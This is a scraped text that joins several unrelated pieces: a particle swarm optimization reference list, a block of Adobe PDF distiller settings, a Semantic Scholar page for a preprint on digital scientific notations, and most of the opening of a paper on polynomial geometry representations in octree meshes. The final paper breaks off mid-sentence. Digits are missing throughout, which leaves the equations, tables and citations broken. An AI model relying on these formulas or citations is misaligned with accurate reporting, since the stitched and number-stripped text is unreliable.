workshop on particle swarm optimization, indianapolis, purdue school of engineering and technology, iupui, indianapolis, in, usa. vol. , – . engelbrecht ap. . particle swarm optimization: iteration strategies revisited. in: brics congress on computational intelligence and th brazilian congress on computational intelligence, recife, brazil. – . fachada n, lopes vv, martins rc, rosa ac. . perfandpubtools—tools for software performance analysis and publishing of results. journal of open research software ( ):e doi . /jors. . fernandes cm, fachada n, laredo j, merelo j, castillo p, rosa ac. . revisiting population structure and particle swarm performance. in: proceedings of the th international joint conference on computational intelligence—volume , seville. – . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/laseeb/openpso http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / / http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /jors. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fernandes cm, laredo jlj, merelo jj, cotta c, rosa ac. . particle swarms with dynamic topologies and conservation of function evaluations. in: proceedings of the international joint conference on computational intelligence, rome, italy. – doi . / . fernandes cm, merelo jj, rosa ac. . an asynchronous and steady state update strategy for the particle swarm optimization algorithm. in: proceedings of parallel problem solving from nature—ppsn xiv, edimburgh, scotland. berlin: springer, – . gutenberg b, richter cf. . magnitude and energy of earthquakes. annali di geofisica : – doi . /ag- . kennedy j, eberhart r. . particle swarm optimization. in: proceedings of ieee international conference on neural networks, perth, autralia. vol. , – doi . /icnn. . . kennedy j, mendes r. . population structure and particle swarm performance. in: proceedings of the ieee world congress on evolutionary computation, honolulu, hawaii, usa. – . liang jj, qin ak, suganthan pn, baskar s. . comprehensive learning particle swarm optimizer for global optimization of multimodal functions. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . liu c, du w-b, wang w-x. . particle swarm optimization with scale-free interactions. plos one ( ):e doi . /journal.pone. . løvbjerg m, krink t. . extending particle swarm optimizers with self-organized criticality. in: proceedings of the ieee congress on evolutionary computation, honolulu, hawaii, usa. vol. . ieee computer society. – . lynn n, suganthan pn. . heterogeneous comprehensive learning particle swarm optimization with enhanced exploration and exploitation. swarm and evolutionary computation : – doi . /j.swevo. . . . majercik s. . green-pso: conserving function evaluations in particle swarm optimization. in: proceedings of the ijcci , vilamoura, portugal. – . mcnabb a. . serial pso results are irrelevant in a multi-core parallel world. in: proceedings of the ieee congress on evolutionary computation, beijing, china. – . rada-vilela j, zhang m, seah w. . a performance study on synchronous and asynchrounous updates in particle swarm. soft computing ( ): – doi . / . . ratnaweera a, halgamuge s, watson h. . self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . shi y, eberhart rc. . empirical study of particle swarm optimization. in: proceedings of ieee international congress on evolutionary computation, washington, dc, usa. vol. , – doi . /cec. . . vora m, mirlanalinee tt. . dynamic small world particle swarm optimizer for function optimization. natural computing ( ): – doi . /s - - - . whitley d, kauth j. . genitor: a different genetic algorithm. in: proceedings of the rocky mountain conference on artificial intelligence, denver, co, usa. – . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /ag- http://dx.doi.org/ . /icnn. . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.swevo. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /cec. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steady state particle swarm introduction materials and methods results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice [pdf] digital scientific notations as a human-computer interface in computer-aided research | semantic scholar skip to search formskip to main content> semantic scholar's logo search sign increate free account you are currently offline. some features of the site may not work correctly. doi: . /peerj.preprints. v corpus id: digital scientific notations as a human-computer interface in computer-aided research @article{hinsen digitalsn, title={digital scientific notations as a human-computer interface in computer-aided research}, author={k. hinsen}, journal={peerj prepr.}, year={ }, volume={ }, pages={e } } k. hinsen published computer science peerj prepr. most of today's scientific research relies on computers and software not only for administrational tasks, but also for processing scientific information. examples of such computer-aided research are the analysis of experimental data or the simulation of phenomena based on theoretical models. with the rapid increase of computational power, scientific software has integrated more and more complex scientific knowledge in a black-box fashion. as a consequence, its users do not know, and don't even… expand view via publisher peerj.com save to library create alert cite launch research feed share this paper figures and topics from this paper figure figure figure figure figure figure view all figures & tables black box human–computer interaction computation simulation computer references showing - of references sort byrelevance most influenced papers recency computer simulations and computational models in science c. imbert computer science view excerpt, references background save alert research feed functional declarative language design and predicate calculus: a practical approach r. boute computer science topl pdf view excerpt, references background save alert research feed the role of programming in the formulation of ideas g. sussman, j. wisdom computer science view excerpts, references background save alert research feed a primer on scientific programming with python h. langtangen computer science pdf view excerpt, references background save alert research feed structure and interpretation of classical mechanics g. sussman, j. wisdom, m. e. mayer physics, computer science view excerpt, references background save alert research feed user interfaces for computational science: a domain specific language for oommf embedded in python m. beg, r. pepper, h. fangohr computer science, physics highly influential pdf view excerpts save alert research feed computational science: shifting the focus from tools to models. k. hinsen medicine f research view excerpt, references background save alert research feed modelica - a unified object-oriented language for system modelling and simulation peter fritzson, vadim engelson computer science ecoop pdf view excerpts, references background save alert research feed computer science and its relation to mathematics d. knuth computer science, mathematics view excerpt, references background save alert research feed computational science: ...error z. merali medicine, physics nature pdf save alert research feed ... ... related papers abstract figures and topics references related papers stay connected with semantic scholar sign up about semantic scholar semantic scholar is a free, ai-powered research tool for scientific literature, based at the allen institute for ai. learn more → resources datasetssupp.aiapiopen corpus organization about usresearchpublishing partnersdata partners   faqcontact proudly built by ai with the help of our collaborators terms of service•privacy policy the allen institute for ai by clicking accept or continuing to use the site, you agree to the terms outlined in our privacy policy, terms of service, and dataset license accept & continue generation of high order geometry representations in octree meshes submitted july accepted november published november corresponding author harald g. klimach, harald.klimach@uni-siegen.de, harald@klimachs.de academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright klimach et al. distributed under creative commons cc-by . open access generation of high order geometry representations in octree meshes harald g. klimach, jens zudrop and sabine p. roller maschinenbau, university of siegen, siegen, germany abstract we propose a robust method to convert triangulated surface data into polynomial volume data. such polynomial representations are required for high-order partial differential solvers, as low-order surface representations would diminish the accuracy of their solution. our proposed method deploys a first order spatial bisection algorithm to find robustly an approximation of given geometries. the resulting voxelization is then used to generate legendre polynomials of arbitrary degree. by embedding the locally defined polynomials in cubical elements of a coarser mesh, this method can reliably approximate even complex structures, like porous media. it thereby is possible to provide appropriate material definitions for high order discontinuous galerkin schemes. we describe the method to construct the polynomial and how it fits into the overall mesh generation. our discussion includes numerical properties of the method and we show some results from applying it to various geometries. we have implemented the described method in our mesh gener- ator seeder, which is publically available under a permissive open-source license. subjects computer aided design, scientific computing and simulation keywords polynomial approximation, discontinuous galerkin, mesh generation, high-order introduction high-order approximations are attractive for numerical simulations on modern computing systems due to their fast error convergence. they can solve complex problems accurately with few degrees of freedom and therefore, low memory consumption. this is an important property, as memory is an expensive resource in nowadays computing systems. the discontinuous galerkin finite element method (dgfem) is a relatively recent numerical scheme, gaining attraction in a wide range of application domains. an introduction and overview is offered by hesthaven & warburton ( ). besides the possibility to use high-order approximations, the local basis definition in dgfem nicely fits the demands of massively parallel and distributed computing systems. thus, a high-order dgfem discretization is a good candidate to solve large scale problems. however, one drawback of high-order methods is the need for appropriate descriptions of geometrical setups in the simulation with the same approximation accuracy as the numerical scheme. we present a method to obtain such a description for inhomogeneous material distributions. specifically, we consider non-smooth distributions, with a clear interface between distinct material properties. such variations in material parameters how to cite this article klimach et al. ( ), generation of high order geometry representations in octree meshes. peerj comput. sci. :e ; doi . /peerj-cs. mailto:harald.klimach@uni-siegen.de mailto:harald@klimachs.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. appear for example in the field of electrodynamics, and we will use a simple scattering by a cylindrical object to highlight the application of the generated material in a dgfem solver. electrodynamics is governed by maxwell’s equations and with an isotropic, linear material they read: ∇ · (εe) = ρe ( ) ∇ · b = ( ) ∂ b ∂t + ∇ × e = ( ) ∂εe ∂t − ∇ × (b/µ) = −j. ( ) gauss’s law ( ) states a direct relation between the divergence of the electrical field e and the electrical charge density ρe. similarly, the magnetic field b has to be divergence free as there are no magnetic charges, which is expressed in ( ). the two fields evolve in time according to faraday’s ( ) and ampère’s law ( ). in these equations, the environment is described by permittivity ε and permeability µ of present materials. our goal is the conversion of surface descriptions that separate regions of different materials into functions of space ε(x,y,z) and µ(x,y,z). though, we will only consider maxwell’s equations in this work, the method is generic and can be used for any partial differential equation with spatially varying material parameters. we consider here a dgfem with polynomial basis functions, and therefore, generate polynomial representations locally in each element. geometry identification is tightly related to mesh generation. therefore, we integrated this method into our meshing tool seeder (klimach et al., ), which is freely available under an open-source licence. seeder creates meshes with cubical elements based on an octree refinement towards boundaries. it uses stl (white, ) files to describe boundary surfaces of arbitrary complexity. with the method, we present here, the cubical elements can now be equipped with additional information to provide the spatial distribution of materials within the cubical elements. the fundamental idea to obtain high-order polynomial representations is the use of a simple first-order voxelization within the coarse elements of the mesh for the dgfem solver. this volume information can then be translated into polynomials by a suitable transformation method. a major feature of the first-order method is its robustness that allows the treatment of complex setups. a drawback is its low accuracy and need for a large number of voxels. however, this is alleviated by using the octree strategy of recursive refinement. it thereby gets feasible to generate accurate polynomials of high-order for arbitrary surfaces. related work our approach is most closely related to embedded boundaries, as used in spectral discretizations. examples of such approaches are the spectral smoothed boundary method (bueno-orovio, pérez-garćıa & fenton, ) and the fourier spectral embedded boundaries (sabetghadam, sharafatmandjoor & norouzi, ). these methods rely on klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a representation of the irregular domain by a function. this function, also referred to as phase-field, is usually constructed with the help of a global rectangular cartesian grid. we extend this concept with an octree mesh, where we apply this method in each of the elements of the mesh. the constructed geometry representation is then defined locally within each mesh cell. this matches the function space of the dgfem and can be directly used by dgfem solvers. within the elements, we also make use of the octree bisection algorithm to achieve a fast voxelization of surfaces. in comparison to a global rectangular domain in spectral methods, the composition of multiple elements in a mesh allows for a greater flexibility in the definition of the embedding domain. by fitting the embedding domain to the actual computational domain of interest, the computational effort can be minimized in this approach. other methods, where irregular meshes are deployed with an internal geometry representation are typically referred to as immersed boundary methods. introduced by peskin ( ) for elastic walls in incompressible flows, this approach has been improved and extended since by various authors. an overview of these methods is for example provided by mittal & iaccarino ( ). similarly to the strategy we follow here, these methods make use of meshes for the computational domain. however, they rely on surface representations to describe objects within the meshes and directly enforce boundary conditions on these. they are popular for flows with moving geometries but do not provide a direct method to describe varying materials, like the change in permeability and permittivity in electrodynamics. in contrast to the embedded boundaries in spectral methods, the immersed boundaries are usually employed in lower order schemes. our goal is the generation of material representations for high-order dgfem solvers. as such, we need a mesh like in the immersed boundary methods, but a high-order functional representation of the geometry as in the embedded boundary methods. this method enables the exploitation of the fast convergence of spectral approximations but still allows for complex computational domains. the traditional approach to boundaries in unstructured, irregular meshes is the fitting of the mesh to the geometry. here, a high-order can be obtained by deforming the elements with curved surfaces. hindenlang, bolemann & munz ( ) offers a method in this direction specifically designed for discontinuous galerkin discretizations. however, the identification of such curved boundaries is much more complex and usually not used for internal interfaces like material changes, as both sides of the interface need to be considered. such deformed, unstructured elements are also subject to varying mesh quality and prone to issues with geometrical constraints. as we will show, the embedding description of materials provides a viable and robust approach to the body fitting of meshes. it comes at the cost of volumetric information that needs to be stored but avoids the need for expensive transformations during the simulation. the seeder mesh generator seeder (harlacher et al., ) is an octree mesh generator. it produces voxelizations of complex geometries defined by surface triangulations in the form of stl files. some klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of the voxelization of a sphere within coarse mesh elements. the sphere is indicated by the yellow surface while the thick black lines outline the elements of the actual mesh. the voxelization within elements follows the octree refinement towards the sphere and is indicated by the thinner white lines. inside the sphere, voxels have been colorized by the flood-fill mechanism with a seed in the center. flooded elements are shown in red; other elements are blue. geometric primitives, like spheres and cylinders, are also available, and we will make use of them in the examples considered here. by voxelization, we refer to the process of subdividing a given volume into smaller cubical elements (voxels) in three-dimensional space. with the octree approach, these cubical elements are successively split into smaller cubes, where needed. an example for the voxelization of a sphere is shown in fig. . the yellow surface indicates the sphere and the red color indicates the voxels completely inside the sphere. note how the voxels build a staircase that approximates the smooth surface. also, the octree refinement is visible in fig. . our concept of voxels does not imply equally sized voxels. instead, as outlined by the white lines, different voxel sizes arise from the bisection rule of the octree approach. thus, we only need to create a large number of small voxels close to the smooth surface while covering the rest of the volume with just a few large ones. the mesh format generated by seeder exploits the topology information from the octree and is designed for the parallel processing on distributed, parallel systems. seeder is freely available online (klimach et al., ) under a permissive bsd license and has been successfully compiled and run on many computing architectures. in the following section, the general voxelization method is briefly outlined. afterward, we explain the extensions to enable high-order material definitions within the mesh elements. basic mesh generation procedure to produce the voxelization, seeder deploys an approach similar to the building cube method by ishida, takahashi & nakahashi ( ). the basic idea is an iterative refinement towards geometry surfaces, followed by a flooding of the computational domain starting from a user defined seed. this flooding is limited by elements intersected by boundary objects and all flooded elements finally constitute the actual computational domain. for the refinement, a bisection in each direction is used in each step, resulting in an octree mesh. such tree structures are well established and widespread in mesh generators to klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. identify and sort geometrical objects fast, see for example yerry & shephard ( ) for an early adoption. in seeder, each geometry has some refinement level, defined by the user, attached to it. this level describes how many bisection steps should be done to resolve the surface. the higher this level, the smaller the voxels to approximate the surface. elements are refined iteratively if they intersect a geometry, until the desired resolution is reached. after this step of boundary identification, the actual computational domain is identified by a d flood filling algorithm. all elements intersected by a geometry bound this flooding. to avoid unintentional spills, the flooding only the considers the six face neighbors (von neumann neighborhood). this mechanism, even though it requires the definition of seeds by the user, is chosen as it provides a high robustness and indifference towards the triangle definitions in stl files. small inaccuracies in the geometry definition are automatically healed, as long as they are below the resolution of the voxelization. this approach has proven to be robust and applicable to a wide range of complex geometries. generation of the polynomial geometry approximation the cubical elements obtained by the mesh generation procedure described in the previous section, provide the frame wherein we now can construct the high-order surface representation. we want this representation in the function space of the dgfem solver, which often are polynomials and in our solver specifically legendre polynomials. legendre polynomials build an orthogonal basis with respect to a weight of one on the interval [− , ], and they adhere to the three-term recurrence relation li(x) = i − i xli− (x) − i − i li− (x). ( ) with l (x) = and l (x) = x the higher order polynomials can be recursively computed by ( ). the first legendre polynomial l (x) = is the only one with an integral mean, all higher ones are mean free on the interval [− , ]. for material interfaces we usually need to deal with discontinuities as the material property jumps at the interfaces. thus, we need to project a step function Ξ(x) =  if x ≤ ξ if x > ξ ( ) to the our polynomial space and find a suitable expansion pn(x) = n i= aili(x) ( ) that approximates ( ). in fig. such a discontinuity with ξ = in ( ) is shown along with its approximation pn(x) from ( ) with various maximal degrees up to n = . while in this simple d example, the projection can be computed analytically, this is not possible anymore for klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure projection of a step function ( ), jumping at x = onto the space of legendre polynomi- als. shown is the step function along with its approximation by more and more legendre basis functions obtained by analytical integration. higher dimensions with arbitrary jump definitions. we, therefore, introduce an algorithm in this section to find approximations of the projection numerically. however, before polynomials can be computed, the material distribution itself needs to be identified. namely, we need to find regions of the domain where a specific material should be present. we achieve this by selectively attaching attributes to elements in the mesh. to define, which elements should be attributed and which not, we can exploit the flood filling algorithm explained above by enabling multiple fillings instead of just a single one. individual surface descriptions confine each flooding, which allows the identification of distinct regions in the mesh. by ascribing a particular material definition to each of these regions, the voxelized spatial material distribution can be obtained. this approach is similar to coloring an image, and we refer to those floodings as colors. in the following, we briefly discuss the coloring concept and then move on to the generation of high-order surface representations within the octree mesh. coloring seeder takes a surface triangulation along with a seed definition to construct the computational domain with non-overlapping cubical elements. the seeds are usually points, but might also be other geometrical objects and are used as the starting point for the flood-filling algorithm. the surface description builds the confinement for the flood-filling. these two parts together are therefore building the volumetric geometry klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure chart of the overall workflow. required inputs are the surface descriptions and seeding points to start the flooding. the resulting output is the expansion of the color distribution in legendre modes for each element. definition in the mesh. by using multiple of such pairs, it gets possible to describe different regions within the same mesh. we refer to this as coloring, and each seed and surface needs to have a color attached to it. the flooding spreads from the seeds and is limited by surfaces of the same color. boundaries of other colors do not affect the flooding and it is possible to have elements flooded by multiple colors. differently colored regions might, therefore, overlap. the color information is then attached to the elements and provide a method to distinguish specific areas in the mesh. afterward, the solver can associate individual material properties to given colors. sub-resolution with the coloring principle described above, we are now able to define arbitrary material areas, but we still need to obtain high-order surface approximations inside the elements of the octree. as this provides information beyond the resolution of the actual mesh, we refer to this as sub-resolution. figure sketches the overall workflow of the algorithm to construct this information. to obtain the sub-resolution as an expansion in legendre polynomials in each element, we need to perform the following three steps: • voxelization (and flooding) within elements of the final mesh to identify color distributions • evaluation of color values at integration points • transformation of point data to polynomial modes these three steps are indicated by a darker orange color in fig. . the other two processes are already described above. a first step creates the coarse mesh with the desired resolution, and after resolving the surfaces within the elements by the voxelization process, all elements and voxels are flood filled with colors. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the first additional step we introduce is the identification of color boundaries inside the coarse mesh elements. luckily, we already have a robust and fast method to identify color boundaries in volumes by the voxelization method described above for the mesh. we can deploy this mechanism also inside elements and recursively refine the voxels towards surfaces. the final mesh will not contain the voxels within the coarse elements but rather the polynomial approximation of the color distribution. we limit the refinement inside elements by setting the number of additional levels ℓ. this number can be freely chosen in the configuration and all elements intersecting a boundary will be refined accordingly, independent of the size of the coarse element. we observe that even though the voxelization is only a first order approximation, it is feasible to represent the surface accurately due to the exponential nature of the bisection approach in the octree. after all voxels are known, the mesh generation algorithm proceeds with flooding as described in the previous section. the flood filling does not heed the intersected coarse elements of the final mesh. instead, all voxels are flooded down to the finest level. with this approach, we do not require a separate algorithm for the flooding of voxels inside intersected elements. figure illustrates the mesh status after refinement and flooding for eight coarse elements intersected by a sphere. the sphere is indicated by the yellow surface and cut open to reveal the voxelization within. thick, black lines indicate the coarse mesh elements and the fine white lines show the sub-resolution voxels within them. as described above, elements in the interior of the sphere are flooded, which is indicated by the red coloring. the flooding is limited by the sphere and all voxels outside the geometry are not flooded with this color. two processes remain to be done at this stage, the evaluation of color values and their transformation to legendre modes. these two are hard to illustrate in three dimensions, and we will instead make use of the one-dimensional setup in fig. . it makes use of the same target step function Ξ with ξ = , as the one in fig. , but outlines the individual numerical steps we take to arrive at an approximation of the analytical projection. vertical grid lines indicate the recursive voxelization towards the surface point. we assume the flooding to happen right of the surface, that is, the seed is at some location x > . this flooding is indicated by the yellow shaded area in fig. . thus, the numerical method has to approximate a step function ( ) with ξ = , illustrated in the figure by the thick red line. with eight bisections in the voxelization, this results in an approximation of the jump location at ξ̂ = . . this state corresponds to the three-dimensional case outlined in fig. . the number of additional refinement levels ℓ determines the spatial accuracy of the surface approximation. however, they only build one half of the numerical approximation; the other half is governed by the quality of the polynomial representation that we construct in the final two steps. the accuracy of our polynomial approximation is determined by the number of chebyshev nodes n at which the color distribution is evaluated. for a given n , klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of the approximation method in d. for a single element and one discontinuity. the color value jumps from to at x = and is indicated by the red line. the grid lines indicate the bisection sequence and the yellow area highlights the region, where the color value is identified to be by the bisecting approximation. an approximant polynomial of degree is constructed from the shown chebyshev nodes (black dots). the orange polynomial shows the analytical projection with degree , also depicted in fig. . chebyshev nodes are given by xc = cos  c − n π  , c = ,...,n. ( ) both factors, ℓ and n , can be set independently by the user. however, they both limit the accuracy of the overall approximation, and for optimal results, they need to be correlated. the minimal distance between the first chebyshev node and the element boundary is proportional to n− , and the length of the smallest voxel within the element is proportional to −ℓ. to resolve all node distances, it is, therefore, necessary to choose the number of additional levels ℓ according to ℓ ≥ ⌈ log (n)⌉. ( ) once the flooding situation of all voxels is known, we can evaluate the color at each chebyshev node. for this, numerical values need to be associated with the flooding status for each color. usually, we assume a value of for flooded voxels and a value of for non-flooded voxels. due to the spatial discretization by an octree, the color value at each chebyshev node xc can be found fast with logarithmic computational complexity. in fig. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the chebyshev nodes ( ) for n = are indicated by black dots and their color value by the elevation of the dots. the approximated step function provides the color values, and we obtain fc = Ξ(xc) with ξ̂ , c = ,...,n ( ) for the polynomial values at the chebyshev nodes xc . it is notable that the position of the surface is only significant up to the interval between two neighboring nodes. a variation of the jump location within the interval between two neighboring nodes does not change the final approximation. the only option to increase the accuracy of the approximation is to use a larger number of integration points n . finally, the transformation of the nodal information ( ) to a suitable function space for the solver has to be done. a typical choice for discontinuous galerkin methods is the orthogonal legendre basis. to obtain the legendre modes ai in ( ) from the values at the chebyshev nodes fc in ( ), we apply the fast polynomial transformation proposed in alpert & rokhlin ( ). however, other target functions with different point sets could also be plugged into the described machinery. the obtained polynomial recovers the function values fc at the nodes exactly and is drawn in fig. by the black line running through all dots. due to the discontinuity of the step function, the representation in polynomial space is an infinite series. the finite approximation suffers from the gibbs phenomenon (wilbraham, ). however, besides this fundamental problem, also inaccuracies due to the numerical integration can be seen as the numerical (black) and the analytical (orange) projections do not coincide in fig. . these result in a distorted location of the jump. in the next section, we will have a closer look at these numerical issues. with this step, we now have a volumetric description that yields a high-order approximation of the surface. note that only intersected coarse mesh elements need to get this information added, all other elements have constant colors. thus, the need for volume information is limited to a small area at the surface. numerical properties in this section, we investigate the numerical properties of the described approximation method. though, the one-dimensional problem with a single jump is much simpler than a real three-dimensional geometry; it is still instructive for the fundamental properties of the algorithm. let us recall that the goal is an appropriate representation of the geometry in a high-order discontinuous galerkin solver. typically, the deployed functions in the solver are smooth within elements. here we consider specifically legendre polynomials, which are attractive due to their orthogonality. the representation of a non-smooth material distribution in the finite smooth function space, therefore, can only be approximate. table shows the convergence behavior for the series of legendre polynomials, obtained by l projections of the step function at x = in the interval [− , ]. a slow convergence can be observed, which is well known for high-order approximations of discontinuous functions. however, the error outside a small band around the discontinuity can be klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the convergence of the series of legendre polynomials towards the step function with the jump at x = . degree l -error . . . . . . . . . . . . improved later on by a post-processing step, as shown in gottlieb & hesthaven ( ). the error is bound to this band around the discontinuity, and the width of that band decreases with the number of degrees of freedom. while we can compute this analytic projection for the simple setup with a single discontinuity in one dimension, this not possible anymore for multiple dimensions and more complex geometries. thus, we need the previously described numerical approach to approximate the projection. in the following, we first analyze how well the numerical scheme recovers the optimal solution given by the l projection for the simple one-dimensional discontinuity. figure shows the convergence of the numerical procedure towards the analytical projection onto a polynomial space with a maximal degree of . plotted is the error over the spatial resolution, where the spatial resolution is given by the number of chebyshev nodes used for the numerical integration. the difference in terms of the l norm to the analytical projection is represented by the blue line and covers all modes of the polynomial. with the red line, the absolute difference in the volume is provided. note that the volume equals to the first mode of the legendre polynomial and thus, is easily obtained. nevertheless, the two curves show a similar behavior, and the volume error can be used as a good indicator of the qualitative behavior of this numerical approximation. apparently, the error does not converge uniformly, but on average we observe a convergence rate of roughly . this error is comparable to the one due to the voxelization, and so these two resolutions (number of voxels and number of integration points) should be in the same range. to investigate the mechanism in d, we look at three different geometrical objects: a sphere, a cube, and a tetrahedron. in each case the overall domain is a cubical box [− , ] × [− , ] × [− , ] subdivided by cubical elements. the sphere is put in 